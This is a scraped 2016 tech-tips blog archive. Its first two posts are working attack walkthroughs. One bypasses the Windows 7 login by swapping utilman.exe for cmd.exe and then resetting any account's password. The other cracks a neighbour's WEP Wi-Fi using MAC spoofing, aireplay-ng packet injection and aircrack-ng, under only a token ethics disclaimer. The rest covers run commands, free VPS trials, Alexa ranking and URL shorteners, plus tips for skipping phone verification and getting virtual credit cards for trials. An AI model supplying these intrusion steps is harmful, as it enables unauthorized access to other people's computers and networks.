Wednesday, 2 March 2016

How to Hack a Windows 7 Password

Sometimes you forget your password, but luckily it's not the end of the world. With a few tricks, you can change the password for any Windows 7 user account on any computer. All you'll need is a Windows 7 installation disc, which you can make yourself for free.

Steps

 

 

  1. 1
    Find or create a Windows 7 installation disc. In order to crack user passwords, you'll need to boot from a Windows 7 installation disc. There are a couple of ways that you can go about getting one:[1]
    • Any Windows 7 installation disc will work, so you may be able to borrow or find one.
    • You can download a Windows 7 ISO and burn it to a disc to create your own installation disc. You can download the ISO legally from Microsoft here, if you have a product key. You can also download the ISO from various torrent sites. Burn the ISO to a blank DVD by right-clicking on it and selecting "Burn to Disc" (Windows 7 later). See How to Create a Recovery Disc in Windows 7 for more details.

  2. 2
    Insert the Windows 7 installation disc and reboot the computer. You'll be booting from the installation disc instead of loading Windows 7 as usual.

  3. 3
    Press the key to enter the computer's BIOS or BOOT menu. This key varies depending on your computer's manufacturer. The key will be displayed on the screen that appears as the computer first boots up. You'll need to press this key before Windows loads. Loading the BOOT menu directly instead of the BIOS menu will be quicker, but not all computers support this.
    • Common keys include F2, F10, F11, or Del.

  4. 4
    Select your disc drive from the BOOT menu. If you loaded directly to the boot menu, select the drive that contains the Windows 7 installation disc. If you loaded to the BIOS menu, navigate to the BOOT section using the keyboard and then change the boot order so that the drive containing the Windows 7 installation disc is listed first.

  5. 5
    Boot from the Windows 7 installation disc and start Windows Setup. If you were in the BIOS, save your changes and exit to reboot the computer and boot from the installation disc. Press any key when prompted to start Windows Setup.

  6. 6
    Set your language and input options. In the first screen that appears, you'll be asked to set your language and input options. You can usually leave everything at the default settings.

  7. 7
    Click the "Repair your computer" link on the "Install now" screen. Instead of clicking "Install now" to start the Windows 7 installation, click the "Repair your computer" button in the bottom-left corner of the window.

  8. 8
    Select "Windows 7" from the list of operating systems. These are all of the operating systems installed on the computer. Most computers will only have one operating system listed here.

  9. 9
    Click the "Command Prompt" link on the next window. This will launch the Command Prompt.

  10. 10
    Enter the following commands, in order. The following four commands will allow you to access the Command Prompt from the Windows Login screen. This will let you reset the passwords once Windows has loaded. Enter each of these commands, in order, pressing Enter after each one:[2]
      C:\
      cd windows\system32
      ren utilman.exe utilman.exe.bak
      copy cmd.exe utilman.exe



  11. 11
    Remove the installation disc and reboot the computer. Allow Windows 7 to load as it normally would.

  12. 12
    Press . Win+U on the Windows Login screen to open the Command Prompt. This would normally load the Accessibility Manager, but the commands you entered earlier renamed the programs so that the Command Prompt loads instead.

  13. 13
    Type .net user and press Enter to display the list of user names. All of the users on the computer will be displayed.

  14. 14
    Change the password for the account you want to access. You can use the net user command to change any user's password to whatever you'd like. Type the following command and press Enter, replacing username with the user you want to crack. If the username has a space in it, surround it in quotes. Enter the new password twice when prompted.
    • net user username *
    • For example, to change the user John Everyman's password, you would type net user "John Everyman" * and press Enter.

  15. 15
    Use your newly-created password to log in. After changing the password in the Command Prompt, you can immediately use the new password to log in on the Windows Login screen. Just select the user that you changed the password for and then enter the new password.
Share:

How To hack Any Wifi using the Backtrack i gave You

 

 

Cracking WEP with BackTrack

I admit, one of my favorite things to do in backtrack is to crack a good ole WIFI. It can lead to so many different options and really brings me back to my roots as to why i stumbled upon backtrack in the first place. I guess it's just thrilling, it gives me  sort of a high to be in places i shouldn't. To be able to completely exploit an entire network as a local user is definitely something that's fun an exciting. I do want to stress the fact that even though we've all maybe done it once or twice, Black Hat hacking is entirely unethical and not condoned here. I may sound hypocritical, but i do not do anything malicious to the machines i exploit. I have permission to do so. This is an Ethical Hackers website for information and security purposes only.
I'm Far from a pro-hacker. I'm Maybe intermediate at best. if anything looks out of the ordinary feel free to email me with any questions or tips. I don't claim to be the best; i'm still learning. However, what i have learned thus far i'm willing to share so here goes:

Today I'm going to demonstrate how insecure the WEP encryption is through wifi. In Today's world you have a lot of people that like to set it and forget it. I'm sure most readers have heard of Verizon, a poineer in telecom. Well in my area Verizon offers high speed internet DSL and FIOS. Great service most of the time. The problem is their Westell DSL modems/WIFI routers come preset to use the WEP encryption. I really wish they would catch on to this. My neighbor has DSL through Verizon. Westell Modem, WEP WIFI!
lets see what we can do!
We will be using the AIR tools, fun fun.

Fire up a shell and run commands as following

1. airmon-ng


 wlan1 is my interface. these can be variable so yours may be different

next, with the information airmon has given you (wlan1) for an interface you want to run these 4 commands.

1. airmon-ng stop wlan1     (Stops the wlan1 interface)
2. ifconfig wlan1 down        (wlan1 no longer in use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the mac address)
4. airmon-ng start wlan1      (restarts the interface with new mac)
Below is what it looked like for me.


In Some situations your Network adapter may not be supported. i will compile a list of supported network adapters in the future. or you can google it.
I have this one:


 


 
However if it did work then you have successfully faked the mac and it's time to keep on moving.
Next thing; and this is obviously important, is to pick a network. do this by running this command

1. airodump-ng wlan1 (MAKE SURE YOUR USING YOUR INTERFACE)

after you run the command, wait a few minutes to get an accurate read on what's out there for wireless networks. hit CTRL+C to cancel the running application and choose a good network that is WEP
i have the network i want to crack in my crosshairs. It's highlighted below:

The next thing we must do is configure airodump-ng to watch that specific network and capture the unique data holding the password and put it into a file (hackedwifi) or whatever you decide to name it.
the command is as follows:

1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)

for me it looks like this:
airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1




This is what your output should look like:


 
Keep in mind rather than opening several terminals i like to tab them using CTRL+SHIFT+T
While you have airodump running,  in a seperate terminal run this command

1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

for me the command looks like this

aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1

In most cases, and in what you want to happen is output saying "association successful" with a smiley face. This is good and if you get this output you are on the right track. If not email me and i will feel free to help you out
.



Now that you are associated with the Access point we need to use aireplay-ng to create an abundance of data on the network so we can sniff out the encrypted PW. Run this command:

1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

for me it looks like this:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1


 

Now it's time to wait. You will notice Airodump going crazy collecting data. Personally, sometimes i leave the room or go do something else for about 20 minutes. What you want is to collect enough Data for the cracker. watch the #Data column. i like to wait until it's between 10,000 and 20,000 before i run the cracker.

Ok, it's been about a half hr and it's time to run the cracker. run this command.

1. aircrack-ng -b (bssid) (filename-01.cap)

if you forgot yourfile just type "dir" and it will be a .cap file.
mine looks like this
aircrack-ng -b 00:12:0E:55:29:13 hackedwifi-01.cap

If you did not sniff enough data it will look like this:

  And IF you did it will look like this:


 The Key to the wireless network is: 6HSKV
to prove it worked i took a screenshot in win7





Happy Hacking!

questions email me: lboyismail@gmail.com
Share:

Tuesday, 1 March 2016

Top from ismail get the Famous BackTrack OS now direct links

BackTrack 5 comes in several flavours and architectures. The following page will help you choose the right version for you. Although registration is not required, we would certainly appreciate it – and it would also give us the opportunity to update you when there are important BackTrack updates or news.

BT is the most wanted OS 
Get it Now 
Direct download  
ENJOY

if any one want the GNOME version contact me
Share:

Top 2016 Browse Faster on a Slow Internet Mobile and PC

Your Mobile or PC Internet speed is very slow and want to browse faster very urgently then here are some tips to help you browse website faster.It will help you to browse any site or blog very fast with very low loading time.You may use the same tips mobile,PC and tablet also.
Actually This is not a trick, It is “Google Web Light” system.Google Web Light is Google’s own website compression service that is designed to work on slow networks. With Google Web Light the chrome for android is able to compress the webpages in such a way that they use 80% less internet data.It will optimized pages load four times faster than the original page and use 80% fewer bytes.Because these pages load so much faster, we also saw a 50% increase in traffic to these pages.

How To Load Faster Webpage On a Slow Net ?

OR
Sometimes Google Web Light would automatically activate when the browser detects slow internet speeds but it works only chrome browser.With this method you can use any web browser when your internet connection gone slow.

Share:

5 Computer Tricks You Must Know

Hello readers, Here I am telling you some most useful and important computer tricks for windows operating system. If you get these tricks you able to use your computer like a expert. Tricks are the thing which never dies and every new day we get a new tricks specially about computers and multimedia. Here is the computer tricks you must know.

Computer Tricks:

1. Creating an Invisible or hidden Folder

This is very easy tricks but only some people know this. First of all you need to create a new folder and then right click and go to the properties of the new folder.
  • Here you see the option Customize click here and then Change the Icon of folder .
  • select the option like this which is invisible or not shown on any place.
  • Now click OK you see and apply this setting on folder
  • Now you see the Invisible folder but you see that the name was not visible .
  • For this Rename the folder and the press the Hotkey:- ALT+255 or ­ ALT+0160 .
  • Now you see the invisible folder put it anywhere as you want .If you find this you just press the hotkey:- CTRL+A. and then you easily see your invisible folder.

2. Hide Your Computer Local Disks

  • Click on the start button and search for cmd or open it.
  • Right click on the cmd prompt and click on run as administrator then your cmd will run .
  • This option will launch command prompt with administrative access option.
  • Now type these word “diskpart ” in command prompt and press enter.
  • Then write these words in command prompt without commas “list volume in” to get the list of all your local drives which you make
  • Now you want to select the drive that you want to hide.For this you need to type “select volume n” (n is the volume number against the drive you want to hide) in command prompt
  • For Ex – select volume 1. Now you write these words ” remove letter C “(C is a drive letter) and then press enter.If you want to hide any other local disks then press the letter instead of C
  • For Ex – remove letter C (this will hide c drive)
That’s it, now your drive is hidden. Now if you want to again show these drives so do the same steps but when you select the volume of disk for example volume 1 .Now you write these words “assign letter C “(C is a drive letter) and then press enter.then you see your disk remain unhide .If you want to unhide any other local disks then press the letter instead of C.

3. Creating an Folder Which is  Un-deletable/Un-renamable

  • Click on the start menu or run the Command prompt or CMD.
  • Now type D: in cmd prompt and then press enter (you also Replace D with the drive letter where you want to create an un-deletable folder look like a virus folder)
  • Now type the letter md con in command prompt and the press enter. (md – make directory)
  • Now you will see an error show below in form of image  while you deleting this folder you face this error.

Now How to Delete this Folder ?

  • Now Again open your command prompt and navigate to the directory file by typing this words “D:” (Replace D with the drive letter where you want to create the un deletable folder)
  • Type rd con which mean(rd – remove directory). Now go to the local disk and see that folder will automatically delete if not then you delete it without facing any type of error.

4. Shutdown PC Notepad

  • Right click on your desktop then choose new text file.
  • Now in the text file type shutdown -s -t 10 and save this file from save as and name the file “mtrick.bat” (bat is an extension which is too important to shutdown PC using timer.)
Note: 10 is the amount of seconds before your computer shuts down you also change it .
  • Now run that file .
  • You can change the icon by right clicking then select properties – change icon and choose the one that looks cool.
  • when you run this file you face an error of 10 sec and the your pc shut down
  • To abort the shutdown schedule simple goto command prompt ands then type shutdown -a and press enter.Your auto shutdown will aborted

5. Disable USB ports on Your PC

  • Pres the hotkey win key + R to run the run window you also run this from the start menu.
  • Type regedit in the box that will be appear in screen and then click OK button
  • This will launch the Registry Editor of your system computer or laptop.
  • Now Navigate to these option that you also see in registry editor.
HKEY_LOCAL_MACHINE
SYSTEM
CurrentControlSet
Services
USBSTOR
  • On right side of you open desktop , double click on Start button
  • In the Value Data you see the text box, enter 4 in the value data .
  • Click on OK.
  • Close your Registry Editor and refresh your desktop 3 to 5 times.
  • Now you see your computer USB Port disable .
  • To enable access to your USB ports , again change the value of value data 4 to 3.
  • Now this time your Computer USB port is enable .
If you like these computer tricks them must share to your friends.
Share:

100 Important Run Commands For Windows OS

In this article, I am going share you the most important Run Commands for Windows user. Any Windows user Windows XP, Windows 7, Windows 8, Windows 10 can find any details, programme, settings and much more with the help of those commands. Here is the list of run commands.

Important Run Commands For Windows OS

  • Accessibility Options : access.cpl
  • Add Hardware : hdwwiz.cpl
  • Add / Remove Programs : appwiz.cpl
  • Administrative Tools : control admintools
  • Automatic Updates : wuaucpl.cpl
  • Wizard file transfer Bluethooth : fsquirt
  • Calculator : calc
  • Certificate Manager : certmgr.msc
  • Character : charmap
  • Checking disk : chkdsk
  • Manager of the album (clipboard) : clipbrd
  • Command Prompt : cmd
  • Service components (DCOM) : dcomcnfg
  • Computer Management : compmgmt.msc
  • DDE active sharing : ddeshare
  • Device Manager : devmgmt.msc
  • DirectX Control Panel (if installed) : directx.cpl
  • DirectX Diagnostic Utility : dxdiag
  • Disk Cleanup : cleanmgr
  • System Information : dxdiag
  • Disk Defragmenter : dfrg.msc
  • Disk Management : diskmgmt.msc
  • Partition manager : diskpart
  • Display Properties : control desktop
  • Properties of the display (2) : desk.cpl
  • Properties display (tab “appearance”) : control color
  • Dr. Watson : drwtsn32
  • Manager vérirficateur drivers : check
  • Event Viewer : Eventvwr.msc
  • Verification of signatures of files : sigverif
  • Findfast (if present) : findfast.cpl
  • Folder Options : control folders
  • Fonts (fonts) : control fonts
  • Fonts folder windows : fonts
  • Free Cell : freecell
  • Game Controllers : Joy.cpl
  • Group Policy (XP Pro) : gpedit.msc
  • Hearts (card game) : mshearts
  • IExpress (file generator. Cab) : IExpress
  • Indexing Service (if not disabled) : ciadv.msc
  • Internet Properties : inetcpl.cpl
  • IPConfig (display configuration) : ipconfig / all
  • IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
  • IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
  • IPConfig (IP configuration cancels maps) : ipconfig / release
  • IPConfig (renew IP configuration maps) : ipconfig / renew
  • Java Control Panel (if present) : jpicpl32.cpl
  • Java Control Panel (if present) : javaws
  • Keyboard Properties : control keyboard
  • Local Security Settings : secpol.msc
  • Local Users and Groups : lusrmgr.msc
  • Logout : logoff
  • Microsoft Chat : winchat
  • Minesweeper (game) : winmine
  • Properties of the mouse : control mouse
  • Properties of the mouse (2) : main.cpl
  • Network Connections : control NetConnect
  • Network Connections (2) : ncpa.cpl
  • Network configuration wizard : netsetup.cpl
  • Notepad : notepad
  • NView Desktop Manager (if installed) : nvtuicpl.cpl
  • Manager links : packager
  • Data Source Administrator ODBC : odbccp32.cpl
  • Screen Keyboard : OSK
  • AC3 Filter (if installed) : ac3filter.cpl
  • Password manager (if present) : Password.cpl
  • Monitor performance : perfmon.msc
  • Monitor performance (2) : perfmon
  • Dialing Properties (phone) : telephon.cpl
  • Power Options : powercfg.cpl
  • Printers and Faxes : control printers
  • Private Character Editor : eudcedit
  • Quicktime (if installed) : QuickTime.cpl
  • Regional and Language Options : intl.cpl
  • Editor of the registry : regedit
  • Remote desktop connection : mstsc
  • Removable Storage : ntmsmgr.msc
  • requests the operator to removable storage : ntmsoprq.msc
  • RSoP (traduction. ..) (XP Pro) : rsop.msc
  • Scanners and Cameras : sticpl.cpl
  • Scheduled Tasks : control schedtasks
  • Security Center : wscui.cpl
  • Console management services : services.msc
  • shared folders : fsmgmt.msc
  • Turn off windows : shutdown
  • Sounds and Audio Devices : mmsys.cpl
  • Spider (card game) : spider
  • Client Network Utility SQL server : cliconfg
  • System Configuration Editor : sysedit
  • System Configuration Utility : msconfig
  • System File Checker (SFC =) (Scan Now) : sfc / scannow
  • SFC (Scan next startup) : sfc / scanonce
  • SFC (Scan each démarraget) : sfc / scanboot
  • SFC (back to default settings) : sfc / revert
  • SFC (purge cache files) : sfc / purgecache
  • SFC (define size CAHC x) : sfc / cachesize = x
  • System Properties : sysdm.cpl
  • Task Manager : taskmgr
  • Telnet client : telnet
  • User Accounts : nusrmgr.cpl
  • Utility Manager (Magnifier, etc) : utilman
  • Windows firewall (XP SP2) : firewall.cpl
  • Microsoft Magnifier : magnify
  • Windows Management Infrastructure : wmimgmt.msc
  • Protection of the accounts database : syskey
  • Windows update : wupdmgr
  • Introducing Windows XP (if not erased) : tourstart
  • Wordpad : write
  • Date and Time Properties : timedate.cpl
It will help you to manage your Windows Pc. If you know more important Run Commands then comment here I will update im my article.
Share:

New Free Trial VPS/RDP List

Here a Free trial VPS list. You can try this trial VPS as a test drive before buying a VPS. Some VPS need credit card for order and some VPS are no need any credit card or payment details.if you don’t have any credit card then you can buy a virtual credit card from here Top Free Virtual Credit Card (VCC) Providers

1. Digital Ocean

30 day SSD cloud vps free trial
– 1GB RAM
– 30GB SSD Disk
– 2TB Bandwidth
– 1 CoreProcessor
Sing up DigitalOcean with this link, you will receive $10 of free credit.

2. myPetaHost 

24 hours free vps trial, no credit card needed

– 1 Core Processor
– 1 GB Memory
– 50 GB Storage
– 100 GB Data Transfer
Visit Here

3. Vpsie

30 days SSD-based VPS cloud servers free trial
– 768MB Memory
– 10GB SSD Space
– 1 CPU Core
– 1TB Bandwidth
Visit vpsie.com you will recieve $4 coupon on mail.

4. DotBlock

1-month trial VPS use coupon 30DAY and reffer code CHBJB
– 1GB Memory
– 20GB SSD Space
– 1 CPU Core
– 500GB Bandwidth
Visit here: DotBlock.com

5. VPS.net

Try a VPS1GB Server for only $2/mo, regular price $12/mo
– 4 CPU Cores
– 1 GB Memory
– 25 GB SSD
– 3 TB Transfer
– 19 International Data Centers
Try VPS.net now

6. BaeHost

10 day Linux/windows VPS free trial
– 2 GB RAM Memory
– 1 core 2.66 Ghz
– Disk 200 GB Raid+SSD Transfer unmetered
– BW up to 7 Mbps
– Transfer unmetered
– 2 Public IP (IPv4/IPv6)
Visit here

7. Incloudibly

7-day VPS free trial try incloudibly’s VPS hosting before you pay
– 1 vCPU x 2.4GHz
– 512 MB RAM
– 20 GB Storage
– 1 TB Bandwidth
– Linux/FreeBSD
Sign up incloudibly’s free VPS trial
Share:

Free Hosted Windows VPS/RDP Trial For 30 Days Instantly

Hello there, Here I am going to share you a great trial VPS offer. Apponfly offers hosted Windows VPS trial for 30 days instantly without any credit card, personal details or mobile number. You need an email id to get this blasting offer. One think, this is a hosted VPS that means you can’t install any other software but don’t worry their already preinstalled apps with chrome browser. So you can browse unlimited for one month.so hurry up to grab this offer.Here are the details to get this free VPS.


How To Get Hosted Windows VPS Trial ?

1. Visit on this link: apponfly
2. Now click on TRY IT FREE 
3. Now type your valid email id and click Start Free Trial.
4. Now a Popup tab will open and it will setting your VPS( it will take some time)
5. To access VPS, you can use Remote Desktop or Web Browser.
Share:

Sunday, 28 February 2016

How to Improve Alexa Ranking in Short Time – 11 Secrets to Increase Alexa Rank 2016

As i never  hide anythings from you, our visitors, so in this article i have just explained what is Alexa Ranking and some important secret tips to improve or increase Alexa rank. For some newbies who entered in the world of blogging it becomes very hard to understand the concept of Alexa Ranking. If you’r one of them then this post will surely help you in boosting the Alexa Rank of your blog/website. Lets see.

What is Alexa Ranking?

Alexa is a Web Information Company by Amazon that maintains the ranking data of every website and blogs upon traffic and many other factors which is discussed in this article. Generally Alexa gets updated daily and main point of Alexa is lesser your rank better.

How Alexa Rank is Measured?

Some of we (Webmaster and blogger) think that Alexa ranks the blogs/websites according to the traffic that we receive on our blog but this truth isn’t sufficient. Alexa ranking not only depends upon the traffic but also depends upon Alexa Toolbar and many other factors which is the main part of this topic and posted below.

How to Improve Alexa Rank Quickly in 2016:-

#1 Claim/Verify Your site on Alexa:

Claiming your site on alexa gives full control over your site and it works like a verification process like Google Analytics, Google Webmaster Tools etc.. This will help others to know who is the owner of that site. So, it’s so important to claim your site at alexa.com and also it helps in ranking better on Alexa. Go here to Claim Your Site on Alexa.com.

#2 Add Alexa Rank Widget to your Blog:

Add Alexa rank widget to your blog, as Alexa counts only those hits which comes under their system. Also, if you are a blogger then you can’t ask to your every blog reader to install Alexa Toolbar in their browser but you can add Alexa rank widget in your blog.So there is no loss of having it.

#3 Install Alexa Toolbar/Extension:

Alexa rank counts the traffic that have the toolbar installed. So, it is good to install Alexa Toolbar in your browser and also Encourage your visitors to install/use Alexa toolbar to their browser. Here, you can Download Alexa Toolbar for your browser.

#4 Write a review about Alexa on you blog:

Alexa loves backlinks to them and good reviews. So, write a good review about Alexa Ranking on you blog and give a backlink to Alexa.com.

#5 Post Good Quality Content:

Nothing is new if we say “Content is Kind” because it is mandatory for all success blogger to write quality content. If you write quality content on your blog then other will automatically link back to you and then your backlinks will increase. Thereby increasing backlinks, traffic will increase which increases your Alexa Rank.

#6 Traffic from Bloggers & Techy guys:

This is the most important factor to be considerd that effects on your Alexa Rank this is because if you’r getting visitors who are blogger and techy guys then your Alexa Rank will increase quickly as all the blogger and Techy guys have Alexa Toolbar on their browsers.

#7 Commenting and Backlinking:

Comment on other blogs which are under similar niche to you blog and which have good traffic. This will create backlinks for your blog. Thereby increasing backlinks your Alexa rank will increase quickly.

#8 Share your Blog on Social Medias:

Various social networking websites are available. If you will not share your blog post in social networking site then how people come to know about your blog and what content are posted on your blog. So share your each blog post URL on Social media platform (e.g. Facebook, Google+, Twitter etc.) this will not only increase your blog traffic but also boost your Alexa Rank.

#9 Update your Blog Regularly:

This is the most important factor which helps in increasing the Alexa ranking. If you will not update regularly your Alexa rank will go down and then it becomes hard to bring back you alexa ranking again. So, I strongly recommend you to update your blog regularly.

#10 Submit your Blogs in Directories:

Many blog directories are available in the internet which stores blog in categories wise. Submitting your blog (or blog post) in directories will make popular inbound links. It will increase traffic and create backlinks to your blog. Thus, good quality backlinks play a major role in increasing PR and hence improving Alexa Rank.

#11 Fix All Broken Links:

This is last and most important point to be considered not only in case of Alexa Ranking but also in case of AdSense and other Ranking field. If your website/blog have many broken links then it surely affect on your Alexa Ranking, your ranking will go down. Evan AdSense will not approve the blog which have many broken links. So, you can use Free Broken Link Checker to check/find broken links quickly and ensure your blog doesn’t contain any broken links.

Conclusion:

These were the top 11 Tips to Increase Alexa Ranking. Some bloggers/webmasters increases Alexa Rank very quickly. The secret behind this fact is to “Get Traffic from bloggers“. If you get traffic from bloggers and you follow above all factors that i have mentioned, then your Alexa Rank will surely improved.
  In the next article, I’ll share some secret and tips about AdSense that How I Got AdSense Approved in first Attempt? and How to get AdSense Approved Quickly. Happy Blogging, Enjoy & Stay Tuned.

Share:

How to Create Gmail Account without Phone Number Verification

Steps to Create Gmail Account without Mobile Number:

  • At First, You need to have an Android device or you can use BlueStack on your PC.
  • Open your Android Device
  • Go to Setting and Open it,
  • You will see on “Accounts” option, open that just by clicking on it,
  • Once you open Account option, click on “Add account
  • On the next screen, click on “Google
  • Now click on “Create a new account
  • Now enter your “First Name” and “Last Name” and then click on NEXT
  • On the next screen, enter your desired Email Username and click NEXT. When your username is available then enter the password for your Gmail account and click on NEXT button.
  • After entering the password, Google will ask you to enter your mobile number. But, now you don’t have to enter any number, yeah, just click on “Skip” button and click NEXT.
  • At last, Google will ask you to select your payment details but no need to enter. Just click on “Remind me later” and click NEXT.
  • Congrats, you have successfully created your Gmail account without any mobile number.
Share:

5 Best Download Manager for Windows 10/8.1 /7 PC/Laptop 2015/2016


#1 IDM – Internet Download Manager

Internet Download Manager(IDM) is truly the best downloader software which I personally use to download all kind of files from the internet. IDM is the tool that boosts download speeds by up to 5 times.
You can download your favorite movies, software, games, videos etc anytime. It supports Proxy servers, FTP and HTTP protocols, firewalls, redirects, cookies. The best thing is that using IDM you can pause and resume the downloading process whenever you want.

Features of Internet Download Manager (IDM)

  • IDM has special Download Accelerator which boosts download speed upto 5 times.
  • IDM supports all popular browsers including Google Chrome, Internet Explorer, Mozilla Firefox and more browsers.
  • It’s intelligent technology can accelerate download speeds upto 5 times.
  • Resume Feature of IDM lets you resume unfinished download from the place you left off.
  • IDM automatically check files for any viruses on download completion.
  • Quick update
  • Support Multi-language.
  • IDM supports Proxy Servers.
Download 
 

#2 Free Download Manager [FDM]

FDM (i.e. Free Download Manager) is similar to “Internet Download Manager”. Like IDM, FDM is also a powerful software which you can easily use to download all kinds of files from internet. As the name implies, it is absolutely free download manager plus downalod accelerator.

Features of FDM (Free Download Manager)

  • It’s absolutely Free Download Manager.
  • Free Download Manager(FDM) splits files into several sections and downloads them simultaneously which directly increase download speed.
  • It has advanced Browser Integration.
  • Using Free Download Manager you can Resume broken and unfinished download from where it was interrupted thus saving your time, nerves, and internet data.
  • It has Smart file manager
  • HTTP/FTP/BitTorrent support
  • It lets you adjust traffic usage for browsing the Internet at the same time downloading files.
  • Site Explorer features lets you view the folders structure of a web site and you can easily download necessary files or folders.
  • Using FDM you download only the necessary part of a particular zip file.
  • It supports Multi(30) languages.
  • HTML Spider lets you download whole web pages or even whole web sites.
  • FDM is Absolutely free and 100% safe
Download 
 

#3 Download Accelerator Plus [DAP]

 

DAP stands for Download Accelerator Plus is one of the fastest Free download Accelerator and most complete set of download tools. It is available in both paid and free versions. DAP is with technical advancements that provide the best download experience.

Features of DAP:

  • Pause and Resume your broken or paused download whenever wanted.
  • Advanced patented technology accelerates download speeds.
  • Automatic Mirror Speed Boost feature will auto switch to faster mirror sites while downloading.
  • Inbuilt download security program.
  • Browser internet and download file directly with DAP
  • Smoother, responsive and faster download manager.
  • DAP is available in 48 Languages.
download 
 

#4 IDA – Internet Download Accelerator

Internet Download Accelerator is the effective solution for top 3 problem about which you think before downloading anything from internet. Yes, I am talking about SPEED, RESUMING broken downloads, and MANAGEMENT of downloaded files.

Features of Internet Download Accelerator

  • IDA has FTP Explorer;
  • It has site manager for password and download folders management;
  • You can schedule your download with scheduler
  • It lets you control download speed
  • IDA has Automatic mode for the most comfortable browsing on the Web while downloading.
  • Dial for dial-up connection
  • Search for files, programs, games, and music effectively.
  • IDA offers IDA toolbar for Internet Explorer and Firefox Browsers.
Download 
 

#5 FlashGet – The Best Download Manager

FlashGet is top leading download manager which uses MHT technique and optimization arithmetic and can truly speed up downloading speed up 6-10 Times. It can optimize downloads, giving you a speed that is impressive enough!
FlashGet has superb features to give you, such as you can easily install and get new skins. Also, there are some interesting add-ons available for FlashGet to increase features. FlashGet is indeed promising as a software to manage downloads in your Windows PC!

Features of FlashGet Download Manager:

  • FlashGet is 100% Clean, free and easy to use.
  • It can call anti-virus automatically to clean all type of viruses after finishing download.
  • Increase & Boost download speed up to 6-10 times.
  • FlashGet supports HTTP, FTP etc. protocols
  • It has powerful files management feature.
Download 

 

 

 

 

 

 

 

 

Share:

Top 5 URL Shorteners to Make Money Online

#1 Shorte.st : Highest Paying URL Shortener

Shorte.st is new free URL shortening service website with more creative ideas and the important point is that you can use their WordPress plugin and make money with links in very way. Shorte.st will pay you 5-12$ per 1000 views for promoting their Shorten Link. Your earning amount (payment) will be send automatically on the 10th day of each month.
  • Payment Method: Paypal or Payoneer
  • Minimum Payout: 5$ through Paypal or 20$ through Payoneer
  • Referral Earnings Rate: 20% commission on referrals – lifetime
  • Alexa Rank (Global): 8,509
  • Link: Register for Shorte.st account.

#2 Bc.vc: Earn Money by Sharing Link

Bc.vc is a modern URL shorten website where users can make good money in the easiest way. You can get paid by sharing your links on the internet. Just register for an account, start shrinking URLs and make money. For every person that visits you URLs and you will get paid. With Bc.vc you can earn about 4$ per 1000 views and with their referral program you can also earn extra 10% commission for the lifetime from your referrals.
  • Referral : 10% Commission for Lifetime.
  • Minimum Payout: 10$ Through Paypal or IBANN
  • Alexa Rank (Global): 2,582
  • Link: Join Bc.vc here.
 

#3 AdF.ly: Most Popular URL Shortener

AdF.ly is an one of the most popular and trusted URL shortening company. Just register for an account and start shrinking URLs. You will get paid when anyone visits on your URLs. With Adf.ly you can earn upto 4$ per 1000 views to your Shorten links.
  • Payment Method: Minimum Payout 5$ by Paypal, Payza or AlertPay.
  • Referral Earnings Rate: 20% Earnings For Lifetime.
  • Alexa Rank (Global): 165.
  • Link: Register on Adf.lf

#4 Linkshrink.Net: Make Money by Shrinking & Sharing Link

Linkshrink.Net is also popular URL shortening website that allow users to make money anytime anywhere when anyone clicks and views your shorten links. Linkshrink pays about 2$ to 5$ per 1000 views and Through referral program you can get 10% commission from the user you referred. That means if you refer 10 users to LinkShrink and if each one of them earns $2 daily then you will be earning a total of $4 daily without any effort at all.
  • Referral Earnings Rate: 10% Earning for Lifetime.
  • Payout Option: Paypal or Payza
  • Alexa Rank (Global): 4,980
  • Link: Join LinkShrink.

#5 Linkbucks:

Linkbuck (having Global Alexa rank 1,038) offers user to make money every time by converting and sharing shorten links. Uou can share anywhere on facebook, Google plus, Twitter, blogs, websites etc. You can create/convert single short link, multiple links or a full-page script that turns your blog/website into a cash machine if you have lots of traffic. Linkbucks is number one competitor of Adf.ly. It can pay 0.5$ to 3$ and minimum payout is 10$.
  • Referral Earning Rate: 20% Commission for Life Time.
  • Payment Option: PayPal or Payoneer.
  • Alexa Rank (Global): 1,038
  • Link: Register on Linkbucks.

Conclusion:

This is the list of Top 5 URL Shortener Website, you can choose any one website to earn a lots of $$$ just by sharing your links anywhere anytime on socials sites, blogs or websites etc. Why i said this is best method because a user can also make $$$ online even they don’t have blog or any websites.  If you’r looking for best websites just for direct URL shortener, not for making money then i highly recommend you to use below sites:
  1. Goo.gl
  2. Bit.ly
 
Share:

Browse In Your Language

Blog Archive